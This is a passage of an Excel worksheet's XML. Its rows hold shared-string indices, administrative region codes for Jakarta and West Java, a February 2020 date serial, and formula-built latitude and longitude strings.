      </c>
      <c r="S1156" t="s">
        <v>547</v>
      </c>
      <c r="T1156" t="s">
        <v>33</v>
      </c>
      <c r="U1156" s="5">
        <v>10688716</v>
      </c>
      <c r="V1156" s="5" t="s">
        <v>15527</v>
      </c>
      <c r="W1156" s="5">
        <v>-615267</v>
      </c>
      <c r="X1156" t="s">
        <v>19309</v>
      </c>
      <c r="Y1156" t="str">
        <f t="shared" si="18"/>
        <v>-6.15267,106.88716</v>
      </c>
    </row>
    <row r="1157" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1157">
        <v>108727</v>
      </c>
      <c r="B1157" s="1">
        <v>43885</v>
      </c>
      <c r="C1157">
        <v>1</v>
      </c>
      <c r="D1157" t="s">
        <v>22</v>
      </c>
      <c r="E1157" t="s">
        <v>23</v>
      </c>
      <c r="F1157" t="s">
        <v>4281</v>
      </c>
      <c r="H1157" t="s">
        <v>26</v>
      </c>
      <c r="I1157" t="s">
        <v>2962</v>
      </c>
      <c r="J1157" t="s">
        <v>4282</v>
      </c>
      <c r="L1157" t="s">
        <v>4283</v>
      </c>
      <c r="M1157">
        <v>3171070005</v>
      </c>
      <c r="N1157">
        <v>3171070</v>
      </c>
      <c r="O1157">
        <v>3171</v>
      </c>
      <c r="P1157">
        <v>31</v>
      </c>
      <c r="Q1157" t="s">
        <v>218</v>
      </c>
      <c r="R1157" t="s">
        <v>121</v>
      </c>
      <c r="S1157" t="s">
        <v>108</v>
      </c>
      <c r="T1157" t="s">
        <v>33</v>
      </c>
      <c r="U1157" s="5">
        <v>10681802</v>
      </c>
      <c r="V1157" s="5" t="s">
        <v>15528</v>
      </c>
      <c r="W1157" s="5">
        <v>-623541</v>
      </c>
      <c r="X1157" t="s">
        <v>19310</v>
      </c>
      <c r="Y1157" t="str">
        <f t="shared" si="18"/>
        <v>-6.23541,106.81802</v>
      </c>
    </row>
    <row r="1158" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1158">
        <v>108729</v>
      </c>
      <c r="B1158" s="1">
        <v>43885</v>
      </c>
      <c r="C1158">
        <v>1</v>
      </c>
      <c r="D1158" t="s">
        <v>22</v>
      </c>
      <c r="E1158" t="s">
        <v>23</v>
      </c>
      <c r="F1158" t="s">
        <v>4284</v>
      </c>
      <c r="G1158" t="s">
        <v>4285</v>
      </c>
      <c r="H1158" t="s">
        <v>26</v>
      </c>
      <c r="I1158" t="s">
        <v>3603</v>
      </c>
      <c r="J1158" t="s">
        <v>4286</v>
      </c>
      <c r="L1158" t="s">
        <v>4287</v>
      </c>
      <c r="M1158">
        <v>3175030002</v>
      </c>
      <c r="N1158">
        <v>3175030</v>
      </c>
      <c r="O1158">
        <v>3175</v>
      </c>
      <c r="P1158">
        <v>31</v>
      </c>
      <c r="Q1158" t="s">
        <v>1592</v>
      </c>
      <c r="R1158" t="s">
        <v>1563</v>
      </c>
      <c r="S1158" t="s">
        <v>547</v>
      </c>
      <c r="T1158" t="s">
        <v>33</v>
      </c>
      <c r="U1158" s="5">
        <v>10688029</v>
      </c>
      <c r="V1158" s="5" t="s">
        <v>15529</v>
      </c>
      <c r="W1158" s="5">
        <v>-615076</v>
      </c>
      <c r="X1158" t="s">
        <v>19311</v>
      </c>
      <c r="Y1158" t="str">
        <f t="shared" si="18"/>
        <v>-6.15076,106.88029</v>
      </c>
    </row>
    <row r="1159" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1159">
        <v>108730</v>
      </c>
      <c r="B1159" s="1">
        <v>43885</v>
      </c>
      <c r="C1159">
        <v>1</v>
      </c>
      <c r="D1159" t="s">
        <v>22</v>
      </c>
      <c r="E1159" t="s">
        <v>23</v>
      </c>
      <c r="F1159" t="s">
        <v>4288</v>
      </c>
      <c r="G1159" t="s">
        <v>4289</v>
      </c>
      <c r="H1159" t="s">
        <v>26</v>
      </c>
      <c r="I1159" t="s">
        <v>1080</v>
      </c>
      <c r="J1159" t="s">
        <v>3350</v>
      </c>
      <c r="L1159" t="s">
        <v>4290</v>
      </c>
      <c r="M1159">
        <v>3172090005</v>
      </c>
      <c r="N1159">
        <v>3172090</v>
      </c>
      <c r="O1159">
        <v>3172</v>
      </c>
      <c r="P1159">
        <v>31</v>
      </c>
      <c r="Q1159" t="s">
        <v>2749</v>
      </c>
      <c r="R1159" t="s">
        <v>890</v>
      </c>
      <c r="S1159" t="s">
        <v>49</v>
      </c>
      <c r="T1159" t="s">
        <v>33</v>
      </c>
      <c r="U1159" s="5">
        <v>10688567</v>
      </c>
      <c r="V1159" s="5" t="s">
        <v>15530</v>
      </c>
      <c r="W1159" s="5">
        <v>-619433</v>
      </c>
      <c r="X1159" t="s">
        <v>19312</v>
      </c>
      <c r="Y1159" t="str">
        <f t="shared" si="18"/>
        <v>-6.19433,106.88567</v>
      </c>
    </row>
    <row r="1160" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1160">
        <v>108731</v>
      </c>
      <c r="B1160" s="1">
        <v>43885</v>
      </c>
      <c r="C1160">
        <v>1</v>
      </c>
      <c r="D1160" t="s">
        <v>22</v>
      </c>
      <c r="E1160" t="s">
        <v>23</v>
      </c>
      <c r="F1160" t="s">
        <v>4291</v>
      </c>
      <c r="H1160" t="s">
        <v>26</v>
      </c>
      <c r="I1160" t="s">
        <v>2196</v>
      </c>
      <c r="J1160" t="s">
        <v>4292</v>
      </c>
      <c r="L1160" t="s">
        <v>4293</v>
      </c>
      <c r="M1160">
        <v>3172070007</v>
      </c>
      <c r="N1160">
        <v>3172070</v>
      </c>
      <c r="O1160">
        <v>3172</v>
      </c>
      <c r="P1160">
        <v>31</v>
      </c>
      <c r="Q1160" t="s">
        <v>3186</v>
      </c>
      <c r="R1160" t="s">
        <v>128</v>
      </c>
      <c r="S1160" t="s">
        <v>49</v>
      </c>
      <c r="T1160" t="s">
        <v>33</v>
      </c>
      <c r="U1160" s="5">
        <v>10690669</v>
      </c>
      <c r="V1160" s="5" t="s">
        <v>15190</v>
      </c>
      <c r="W1160" s="5">
        <v>-621880</v>
      </c>
      <c r="X1160" t="s">
        <v>19313</v>
      </c>
      <c r="Y1160" t="str">
        <f t="shared" si="18"/>
        <v>-6.21880,106.90669</v>
      </c>
    </row>
    <row r="1161" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1161">
        <v>108732</v>
      </c>
      <c r="B1161" s="1">
        <v>43885</v>
      </c>
      <c r="C1161">
        <v>1</v>
      </c>
      <c r="D1161" t="s">
        <v>22</v>
      </c>
      <c r="E1161" t="s">
        <v>23</v>
      </c>
      <c r="F1161" t="s">
        <v>4294</v>
      </c>
      <c r="G1161" t="s">
        <v>4295</v>
      </c>
      <c r="H1161" t="s">
        <v>26</v>
      </c>
      <c r="I1161" t="s">
        <v>3275</v>
      </c>
      <c r="J1161" t="s">
        <v>2627</v>
      </c>
      <c r="L1161" t="s">
        <v>4296</v>
      </c>
      <c r="M1161">
        <v>3216081006</v>
      </c>
      <c r="N1161">
        <v>3216081</v>
      </c>
      <c r="O1161">
        <v>3216</v>
      </c>
      <c r="P1161">
        <v>32</v>
      </c>
      <c r="Q1161" t="s">
        <v>2511</v>
      </c>
      <c r="R1161" t="s">
        <v>2512</v>
      </c>
      <c r="S1161" t="s">
        <v>41</v>
      </c>
      <c r="T1161" t="s">
        <v>42</v>
      </c>
      <c r="U1161" s="5">
        <v>10704932</v>
      </c>
      <c r="V1161" s="5" t="s">
        <v>15531</v>
      </c>
      <c r="W1161" s="5">
        <v>-623815</v>
      </c>
      <c r="X1161" t="s">
        <v>19314</v>
      </c>
      <c r="Y1161" t="str">
        <f t="shared" si="18"/>
        <v>-6.23815,107.04932</v>
      </c>
    </row>
    <row r="1162" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1162">
        <v>108733</v>
      </c>
      <c r="B1162" s="1">
        <v>43885</v>
      </c>
      <c r="C1162">
        <v>1</v>
      </c>
      <c r="D1162" t="s">
        <v>22</v>
      </c>
      <c r="E1162" t="s">
        <v>23</v>
      </c>
      <c r="F1162" t="s">
        <v>4297</v>
      </c>
      <c r="G1162" t="s">
        <v>4298</v>
      </c>
      <c r="H1162" t="s">
        <v>26</v>
      </c>
      <c r="I1162" t="s">
        <v>137</v>
      </c>
      <c r="J1162" t="s">
        <v>1182</v>
      </c>
      <c r="M1162">
        <v>3175010003</v>
      </c>
      <c r="N1162">
        <v>3175010</v>
      </c>
      <c r="O1162">
        <v>3175</v>
      </c>
      <c r="P1162">
        <v>31</v>
      </c>
      <c r="Q1162" t="s">
        <v>545</v>
      </c>
      <c r="R1162" t="s">
        <v>546</v>
      </c>
      <c r="S1162" t="s">
        <v>547</v>
      </c>
      <c r="T1162" t="s">
        <v>33</v>
      </c>
      <c r="U1162" s="5">
        <v>10678197</v>
      </c>
      <c r="V1162" s="5" t="s">
        <v>15532</v>
      </c>
      <c r="W1162" s="5">
        <v>-614151</v>
      </c>
      <c r="X1162" t="s">
        <v>19315</v>
      </c>
      <c r="Y1162" t="str">
        <f t="shared" si="18"/>
        <v>-6.14151,106.78197</v>
      </c>
    </row>
    <row r="1163" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1163">
        <v>108734</v>
      </c>
      <c r="B1163" s="1">
        <v>43885</v>
      </c>
      <c r="C1163">
        <v>1</v>
      </c>
      <c r="D1163" t="s">
        <v>22</v>
      </c>
      <c r="E1163" t="s">
        <v>23</v>
      </c>
      <c r="F1163" t="s">
        <v>4299</v>
      </c>
      <c r="G1163" t="s">
        <v>4300</v>
      </c>
      <c r="H1163" t="s">
        <v>26</v>
      </c>
      <c r="I1163" t="s">
        <v>166</v>
      </c>
      <c r="J1163" t="s">
        <v>2916</v>
      </c>
      <c r="L1163" t="s">
        <v>4301</v>
      </c>
      <c r="M1163">
        <v>3172040003</v>
      </c>
      <c r="N1163">
        <v>3172040</v>
      </c>
      <c r="O1163">
        <v>3172</v>
      </c>
      <c r="P1163">
        <v>31</v>
      </c>
      <c r="Q1163" t="s">
        <v>552</v>
      </c>
      <c r="R1163" t="s">
        <v>281</v>
      </c>
      <c r="S1163" t="s">
        <v>49</v>
      </c>
      <c r="T1163" t="s">
        <v>33</v>
      </c>
      <c r="U1163" s="5">
        <v>10688247</v>
      </c>
      <c r="V1163" s="5" t="s">
        <v>15533</v>
      </c>
      <c r="W1163" s="5">
        <v>-626351</v>
      </c>
      <c r="X1163" t="s">
        <v>19316</v>
      </c>
      <c r="Y1163" t="str">
        <f t="shared" si="18"/>
        <v>-6.26351,106.88247</v>
      </c>
    </row>
    <row r="1164" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1164">
        <v>108735</v>
      </c>
      <c r="B1164" s="1">
        <v>43885</v>
      </c>
      <c r="C1164">
        <v>1</v>
      </c>
      <c r="D1164" t="s">
        <v>22</v>
      </c>
      <c r="E1164" t="s">
        <v>23</v>
      </c>
      <c r="F1164" t="s">
        <v>4302</v>
      </c>
      <c r="H1164" t="s">
        <v>26</v>
      </c>
      <c r="I1164" t="s">
        <v>974</v>
      </c>
      <c r="J1164" t="s">
        <v>3166</v>
      </c>
      <c r="L1164" t="s">
        <v>4303</v>
      </c>
      <c r="M1164">
        <v>3172100002</v>
      </c>
      <c r="N1164">
        <v>3172100</v>
      </c>
      <c r="O1164">
        <v>3172</v>
      </c>
      <c r="P1164">
        <v>31</v>
      </c>
      <c r="Q1164" t="s">
        <v>3168</v>
      </c>
      <c r="R1164" t="s">
        <v>1436</v>
      </c>
      <c r="S1164" t="s">
        <v>49</v>
      </c>
      <c r="T1164" t="s">
        <v>33</v>
      </c>
      <c r="U1164" s="5">
        <v>10685648</v>
      </c>
      <c r="V1164" s="5" t="s">
        <v>15534</v>
      </c>
      <c r="W1164" s="5">
        <v>-619897</v>
      </c>
      <c r="X1164" t="s">
        <v>18986</v>
      </c>
      <c r="Y1164" t="str">
        <f t="shared" si="18"/>
        <v>-6.19897,106.85648</v>
      </c>
    </row>
    <row r="1165" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1165">
        <v>108736</v>
      </c>
      <c r="B1165" s="1">
        <v>43885</v>
      </c>
      <c r="C1165">
        <v>1</v>
      </c>
      <c r="D1165" t="s">
        <v>22</v>
      </c>
      <c r="E1165" t="s">
        <v>23</v>
      </c>
      <c r="F1165" t="s">
        <v>4304</v>
      </c>
      <c r="G1165" t="s">
        <v>4305</v>
      </c>
      <c r="H1165" t="s">
        <v>26</v>
      </c>
      <c r="I1165" t="s">
        <v>3095</v>
      </c>
      <c r="J1165" t="s">
        <v>4306</v>
      </c>
      <c r="L1165" t="s">
        <v>4307</v>
      </c>
      <c r="M1165">
        <v>3173060007</v>
      </c>
      <c r="N1165">
        <v>3173060</v>
      </c>
      <c r="O1165">
        <v>3173</v>
      </c>
      <c r="P1165">
        <v>31</v>
      </c>
      <c r="Q1165" t="s">
        <v>61</v>
      </c>
      <c r="R1165" t="s">
        <v>61</v>
      </c>
      <c r="S1165" t="s">
        <v>62</v>
      </c>
      <c r="T1165" t="s">
        <v>33</v>
      </c>
      <c r="U1165" s="5">
        <v>10684555</v>
      </c>
      <c r="V1165" s="5" t="s">
        <v>15535</v>
      </c>
      <c r="W1165" s="5">
        <v>-616586</v>
      </c>
      <c r="X1165" t="s">
        <v>19317</v>
      </c>
      <c r="Y1165" t="str">
        <f t="shared" si="18"/>
        <v>-6.16586,106.84555</v>
      </c>
    </row>
    <row r="1166" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1166">
        <v>108737</v>
      </c>
      <c r="B1166" s="1">
        <v>43885</v>
      </c>
      <c r="C1166">
        <v>1</v>
      </c>
      <c r="D1166" t="s">
        <v>22</v>
      </c>
      <c r="E1166" t="s">
        <v>23</v>
      </c>
      <c r="F1166" t="s">
        <v>4308</v>
      </c>
      <c r="G1166" t="s">
        <v>4309</v>
      </c>
      <c r="H1166" t="s">
        <v>26</v>
      </c>
      <c r="I1166" t="s">
        <v>1513</v>
      </c>
      <c r="J1166" t="s">
        <v>1605</v>
      </c>
      <c r="L1166" t="s">
        <v>4310</v>
      </c>
      <c r="M1166">
        <v>3174040007</v>
      </c>
      <c r="N1166">
        <v>3174040</v>
      </c>
      <c r="O1166">
        <v>3174</v>
      </c>
      <c r="P1166">
        <v>31</v>
      </c>
      <c r="Q1166" t="s">
        <v>389</v>
      </c>
      <c r="R1166" t="s">
        <v>377</v>
      </c>
      <c r="S1166" t="s">
        <v>32</v>
      </c>
      <c r="T1166" t="s">
        <v>33</v>
      </c>
      <c r="U1166" s="5">
        <v>10678833</v>
      </c>
      <c r="V1166" s="5" t="s">
        <v>15536</v>
      </c>
      <c r="W1166" s="5">
        <v>-614538</v>
      </c>
      <c r="X1166" t="s">
        <v>19318</v>
      </c>
      <c r="Y1166" t="str">
        <f t="shared" si="18"/>
        <v>-6.14538,106.78833</v>
      </c>
    </row>
    <row r="1167" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1167">
        <v>108738</v>
      </c>
      <c r="B1167" s="1">
        <v>43885</v>
      </c>
      <c r="C1167">
        <v>1</v>
      </c>
      <c r="D1167" t="s">
        <v>22</v>
      </c>
      <c r="E1167" t="s">
        <v>23</v>
      </c>
      <c r="F1167" t="s">
        <v>4311</v>
      </c>
      <c r="G1167" t="s">
        <v>4312</v>
      </c>
      <c r="H1167" t="s">
        <v>26</v>
      </c>
      <c r="I1167" t="s">
        <v>166</v>
      </c>
      <c r="J1167" t="s">
        <v>4313</v>
      </c>
      <c r="L1167" t="s">
        <v>4314</v>
      </c>
      <c r="M1167">
        <v>3173040001</v>
      </c>
      <c r="N1167">
        <v>3173040</v>
      </c>
      <c r="O1167">
        <v>3173</v>
      </c>
      <c r="P1167">
        <v>31</v>
      </c>
      <c r="Q1167" t="s">
        <v>1598</v>
      </c>
      <c r="R1167" t="s">
        <v>1598</v>
      </c>
      <c r="S1167" t="s">
        <v>62</v>
      </c>
      <c r="T1167" t="s">
        <v>33</v>
      </c>
      <c r="U1167" s="5">
        <v>10685279</v>
      </c>
      <c r="V1167" s="5" t="s">
        <v>15537</v>
      </c>
      <c r="W1167" s="5">
        <v>-618121</v>
      </c>
      <c r="X1167" t="s">
        <v>19319</v>
      </c>
      <c r="Y1167" t="str">
        <f t="shared" si="18"/>
        <v>-6.18121,106.85279</v>
      </c>
    </row>
    <row r="1168" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1168">
        <v>108739</v>
      </c>
      <c r="B1168" s="1">
        <v>43885</v>
      </c>
      <c r="C1168">
        <v>1</v>
      </c>
      <c r="D1168" t="s">
        <v>22</v>
      </c>
      <c r="E1168" t="s">
        <v>23</v>
      </c>
      <c r="F1168" t="s">
        <v>4315</v>
      </c>
      <c r="H1168" t="s">
        <v>26</v>
      </c>
      <c r="I1168" t="s">
        <v>65</v>
      </c>
      <c r="J1168" t="s">
        <v>3066</v>
      </c>
      <c r="L1168" t="s">
        <v>4316</v>
      </c>
      <c r="M1168">
        <v>3173020001</v>
      </c>
      <c r="N1168">
        <v>3173020</v>
      </c>
      <c r="O1168">
        <v>3173</v>
      </c>
      <c r="P1168">
        <v>31</v>
      </c>
      <c r="Q1168" t="s">
        <v>179</v>
      </c>
      <c r="R1168" t="s">
        <v>179</v>
      </c>
      <c r="S1168" t="s">
        <v>62</v>
      </c>
      <c r="T1168" t="s">
        <v>33</v>
      </c>
      <c r="U1168" s="5">
        <v>10683380</v>
      </c>
      <c r="V1168" s="5" t="s">
        <v>15158</v>
      </c>
      <c r="W1168" s="5">
        <v>-619926</v>
      </c>
      <c r="X1168" t="s">
        <v>18957</v>
      </c>
      <c r="Y1168" t="str">
        <f t="shared" si="18"/>
        <v>-6.19926,106.83380</v>
      </c>
    </row>
    <row r="1169" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1169">
        <v>108740</v>
      </c>
      <c r="B1169" s="1">
        <v>43885</v>
      </c>
      <c r="C1169">
        <v>1</v>
      </c>
      <c r="D1169" t="s">
        <v>22</v>
      </c>
      <c r="E1169" t="s">
        <v>23</v>
      </c>
      <c r="F1169" t="s">
        <v>4317</v>
      </c>
      <c r="G1169" t="s">
        <v>4318</v>
      </c>
      <c r="H1169" t="s">
        <v>26</v>
      </c>
      <c r="I1169" t="s">
        <v>65</v>
      </c>
      <c r="J1169" t="s">
        <v>2627</v>
      </c>
      <c r="M1169">
        <v>3275060008</v>
      </c>
      <c r="N1169">
        <v>3275060</v>
      </c>
      <c r="O1169">
        <v>3275</v>
      </c>
      <c r="P1169">
        <v>32</v>
      </c>
      <c r="Q1169" t="s">
        <v>2473</v>
      </c>
      <c r="R1169" t="s">
        <v>114</v>
      </c>
      <c r="S1169" t="s">
        <v>41</v>
      </c>
      <c r="T1169" t="s">
        <v>42</v>
      </c>
      <c r="U1169" s="5">
        <v>10696993</v>
      </c>
      <c r="V1169" s="5" t="s">
        <v>15538</v>
      </c>
      <c r="W1169" s="5">
        <v>-624201</v>
      </c>
      <c r="X1169" t="s">
        <v>19320</v>
      </c>
      <c r="Y1169" t="str">
        <f t="shared" si="18"/>
        <v>-6.24201,106.96993</v>
      </c>
    </row>
    <row r="1170" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1170">
        <v>108741</v>
      </c>
      <c r="B1170" s="1">
        <v>43885</v>
      </c>
      <c r="C1170">
        <v>1</v>
      </c>
      <c r="D1170" t="s">
        <v>22</v>
      </c>
      <c r="E1170" t="s">
        <v>23</v>
      </c>
      <c r="F1170" t="s">
        <v>4319</v>
      </c>
      <c r="G1170" t="s">
        <v>4320</v>
      </c>
      <c r="H1170" t="s">
        <v>26</v>
      </c>
      <c r="I1170" t="s">
        <v>193</v>
      </c>
      <c r="J1170" t="s">
        <v>2532</v>
      </c>
      <c r="M1170">
        <v>3172040003</v>
      </c>
      <c r="N1170">
        <v>3172040</v>
      </c>
      <c r="O1170">
        <v>3172</v>
      </c>
      <c r="P1170">
        <v>31</v>
      </c>
      <c r="Q1170" t="s">
        <v>552</v>
      </c>
      <c r="R1170" t="s">
        <v>281</v>
      </c>
      <c r="S1170" t="s">
        <v>49</v>
      </c>
      <c r="T1170" t="s">
        <v>33</v>
      </c>
      <c r="U1170" s="5">
        <v>10687865</v>
      </c>
      <c r="V1170" s="5" t="s">
        <v>15539</v>
      </c>
      <c r="W1170" s="5">
        <v>-626287</v>
      </c>
      <c r="X1170" t="s">
        <v>19286</v>
      </c>
      <c r="Y1170" t="str">
        <f t="shared" si="18"/>
        <v>-6.26287,106.87865</v>
      </c>
    </row>
    <row r="1171" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1171">
        <v>108742</v>
      </c>
      <c r="B1171" s="1">
        <v>43885</v>
      </c>
      <c r="C1171">
        <v>1</v>
      </c>
      <c r="D1171" t="s">
        <v>22</v>
      </c>
      <c r="E1171" t="s">
        <v>23</v>
      </c>
      <c r="F1171" t="s">
        <v>4321</v>
      </c>
      <c r="G1171" t="s">
        <v>4322</v>
      </c>
      <c r="H1171" t="s">
        <v>26</v>
      </c>
      <c r="I1171" t="s">
        <v>1953</v>
      </c>
      <c r="J1171" t="s">
        <v>1585</v>
      </c>
      <c r="L1171" t="s">
        <v>4323</v>
      </c>
      <c r="M1171">
        <v>3173060006</v>
      </c>
      <c r="N1171">
        <v>3173060</v>
      </c>
      <c r="O1171">
        <v>3173</v>
      </c>
      <c r="P1171">
        <v>31</v>
      </c>
      <c r="Q1171" t="s">
        <v>1587</v>
      </c>
      <c r="R1171" t="s">
        <v>61</v>
      </c>
      <c r="S1171" t="s">
        <v>62</v>
      </c>
      <c r="T1171" t="s">
        <v>33</v>
      </c>
      <c r="U1171" s="5">
        <v>10685226</v>
      </c>
      <c r="V1171" s="5" t="s">
        <v>15540</v>
      </c>
      <c r="W1171" s="5">
        <v>-615569</v>
      </c>
      <c r="X1171" t="s">
        <v>19321</v>
      </c>
      <c r="Y1171" t="str">
        <f t="shared" si="18"/>
        <v>-6.15569,106.85226</v>
      </c>
    </row>
    <row r="1172" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1172">
        <v>108743</v>
      </c>
      <c r="B1172" s="1">
        <v>43885</v>
      </c>
      <c r="C1172">
        <v>1</v>
      </c>
      <c r="D1172" t="s">
        <v>22</v>
      </c>
      <c r="E1172" t="s">
        <v>23</v>
      </c>
      <c r="F1172" t="s">
        <v>4324</v>
      </c>
      <c r="G1172" t="s">
        <v>4325</v>
      </c>
      <c r="H1172" t="s">
        <v>26</v>
      </c>
      <c r="I1172" t="s">
        <v>65</v>
      </c>
      <c r="J1172" t="s">
        <v>2296</v>
      </c>
      <c r="L1172" t="s">
        <v>4326</v>
      </c>
      <c r="M1172">
        <v>3173060002</v>
      </c>
      <c r="N1172">
        <v>3173060</v>
      </c>
      <c r="O1172">
        <v>3173</v>
      </c>
      <c r="P1172">
        <v>31</v>
      </c>
      <c r="Q1172" t="s">
        <v>60</v>
      </c>
      <c r="R1172" t="s">
        <v>61</v>
      </c>
      <c r="S1172" t="s">
        <v>62</v>
      </c>
      <c r="T1172" t="s">
        <v>33</v>
      </c>
      <c r="U1172" s="5">
        <v>10686706</v>
      </c>
      <c r="V1172" s="5" t="s">
        <v>15541</v>
      </c>
      <c r="W1172" s="5">
        <v>-616632</v>
      </c>
      <c r="X1172" t="s">
        <v>19322</v>
      </c>
      <c r="Y1172" t="str">
        <f t="shared" si="18"/>
        <v>-6.16632,106.86706</v>
      </c>
    </row>
    <row r="1173" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1173">
        <v>108744</v>
      </c>
      <c r="B1173" s="1">
        <v>43885</v>
      </c>
      <c r="C1173">
        <v>1</v>
      </c>
      <c r="D1173" t="s">
        <v>22</v>
      </c>
      <c r="E1173" t="s">
        <v>23</v>
      </c>
      <c r="F1173" t="s">
        <v>4327</v>
      </c>
      <c r="G1173" t="s">
        <v>4328</v>
      </c>
      <c r="H1173" t="s">
        <v>26</v>
      </c>
      <c r="I1173" t="s">
        <v>1971</v>
      </c>
      <c r="J1173" t="s">
        <v>3562</v>
      </c>
      <c r="L1173" t="s">
        <v>4329</v>
      </c>
      <c r="M1173">
        <v>3172080007</v>
      </c>
      <c r="N1173">
        <v>3172080</v>
      </c>
      <c r="O1173">
        <v>3172</v>
      </c>
      <c r="P1173">
        <v>31</v>
      </c>
      <c r="Q1173" t="s">
        <v>2307</v>
      </c>
      <c r="R1173" t="s">
        <v>141</v>
      </c>
      <c r="S1173" t="s">
        <v>49</v>
      </c>
      <c r="T1173" t="s">
        <v>33</v>
      </c>
      <c r="U1173" s="5">
        <v>10692252</v>
      </c>
      <c r="V1173" s="5" t="s">
        <v>15542</v>
      </c>
      <c r="W1173" s="5">
        <v>-618500</v>
      </c>
      <c r="X1173" t="s">
        <v>19323</v>
      </c>
      <c r="Y1173" t="str">
        <f t="shared" si="18"/>
        <v>-6.18500,106.92252</v>
      </c>
    </row>
    <row r="1174" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1174">
        <v>108745</v>
      </c>
      <c r="B1174" s="1">
        <v>43885</v>
      </c>
      <c r="C1174">
        <v>1</v>
      </c>
      <c r="D1174" t="s">
        <v>22</v>
      </c>
      <c r="E1174" t="s">
        <v>23</v>
      </c>
      <c r="F1174" t="s">
        <v>4330</v>
      </c>
      <c r="G1174" t="s">
        <v>4331</v>
      </c>
      <c r="H1174" t="s">
        <v>26</v>
      </c>
      <c r="I1174" t="s">
        <v>4332</v>
      </c>
      <c r="J1174" t="s">
        <v>4333</v>
      </c>
      <c r="L1174" t="s">
        <v>4334</v>
      </c>
      <c r="M1174">
        <v>3174070003</v>
      </c>
      <c r="N1174">
        <v>3174070</v>
      </c>
      <c r="O1174">
        <v>3174</v>
      </c>
      <c r="P1174">
        <v>31</v>
      </c>
      <c r="Q1174" t="s">
        <v>1260</v>
      </c>
      <c r="R1174" t="s">
        <v>84</v>
      </c>
      <c r="S1174" t="s">
        <v>32</v>
      </c>
      <c r="T1174" t="s">
        <v>33</v>
      </c>
      <c r="U1174" s="5">
        <v>10675662</v>
      </c>
      <c r="V1174" s="5" t="s">
        <v>15543</v>
      </c>
      <c r="W1174" s="5">
        <v>-615644</v>
      </c>
      <c r="X1174" t="s">
        <v>19324</v>
      </c>
      <c r="Y1174" t="str">
        <f t="shared" si="18"/>
        <v>-6.15644,106.75662</v>
      </c>
    </row>
    <row r="1175" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1175">
        <v>108746</v>
      </c>
      <c r="B1175" s="1">
        <v>43885</v>
      </c>
      <c r="C1175">
        <v>1</v>
      </c>
      <c r="D1175" t="s">
        <v>22</v>
      </c>
      <c r="E1175" t="s">
        <v>23</v>
      </c>
      <c r="F1175" t="s">
        <v>4335</v>
      </c>
      <c r="G1175" t="s">
        <v>4336</v>
      </c>
      <c r="H1175" t="s">
        <v>26</v>
      </c>
      <c r="I1175" t="s">
        <v>1513</v>
      </c>
      <c r="J1175" t="s">
        <v>4337</v>
      </c>
      <c r="L1175" t="s">
        <v>4338</v>
      </c>
      <c r="M1175">
        <v>3171100001</v>
      </c>
      <c r="N1175">
        <v>3171100</v>
      </c>
      <c r="O1175">
        <v>3171</v>
      </c>
      <c r="P1175">
        <v>31</v>
      </c>
      <c r="Q1175" t="s">
        <v>1474</v>
      </c>
      <c r="R1175" t="s">
        <v>107</v>
      </c>
      <c r="S1175" t="s">
        <v>108</v>
      </c>
      <c r="T1175" t="s">
        <v>33</v>
      </c>
      <c r="U1175" s="5">
        <v>10681920</v>
      </c>
      <c r="V1175" s="5" t="s">
        <v>15544</v>
      </c>
      <c r="W1175" s="5">
        <v>-622104</v>
      </c>
      <c r="X1175" t="s">
        <v>19325</v>
      </c>
      <c r="Y1175" t="str">
        <f t="shared" si="18"/>
        <v>-6.22104,106.81920</v>
      </c>
    </row>
    <row r="1176" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1176">
        <v>108747</v>
      </c>
      <c r="B1176" s="1">
        <v>43885</v>
      </c>
      <c r="C1176">
        <v>1</v>
      </c>
      <c r="D1176" t="s">
        <v>22</v>
      </c>
      <c r="E1176" t="s">
        <v>23</v>
      </c>
      <c r="F1176" t="s">
        <v>4339</v>
      </c>
      <c r="H1176" t="s">
        <v>26</v>
      </c>
      <c r="I1176" t="s">
        <v>4340</v>
      </c>
      <c r="J1176" t="s">
        <v>2189</v>
      </c>
      <c r="L1176" t="s">
        <v>4341</v>
      </c>
      <c r="M1176">
        <v>3174020001</v>
      </c>
      <c r="N1176">
        <v>3174020</v>
      </c>
      <c r="O1176">
        <v>3174</v>
      </c>
      <c r="P1176">
        <v>31</v>
      </c>
      <c r="Q1176" t="s">
        <v>2191</v>
      </c>
      <c r="R1176" t="s">
        <v>31</v>
      </c>
      <c r="S1176" t="s">
        <v>32</v>
      </c>
      <c r="T1176" t="s">
        <v>33</v>
      </c>
      <c r="U1176" s="5">
        <v>10677472</v>
      </c>
      <c r="V1176" s="5" t="s">
        <v>15545</v>
      </c>
      <c r="W1176" s="5">
        <v>-622087</v>
      </c>
      <c r="X1176" t="s">
        <v>19326</v>
      </c>
      <c r="Y1176" t="str">
        <f t="shared" si="18"/>
        <v>-6.22087,106.77472</v>
      </c>
    </row>
    <row r="1177" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1177">
        <v>108748</v>
      </c>
      <c r="B1177" s="1">
        <v>43885</v>
      </c>
      <c r="C1177">
        <v>1</v>
      </c>
      <c r="D1177" t="s">
        <v>22</v>
      </c>
      <c r="E1177" t="s">
        <v>23</v>
      </c>
      <c r="F1177" t="s">
        <v>4342</v>
      </c>
      <c r="G1177" t="s">
        <v>4343</v>
      </c>
      <c r="H1177" t="s">
        <v>26</v>
      </c>
      <c r="I1177" t="s">
        <v>624</v>
      </c>
      <c r="J1177" t="s">
        <v>3171</v>
      </c>
      <c r="M1177">
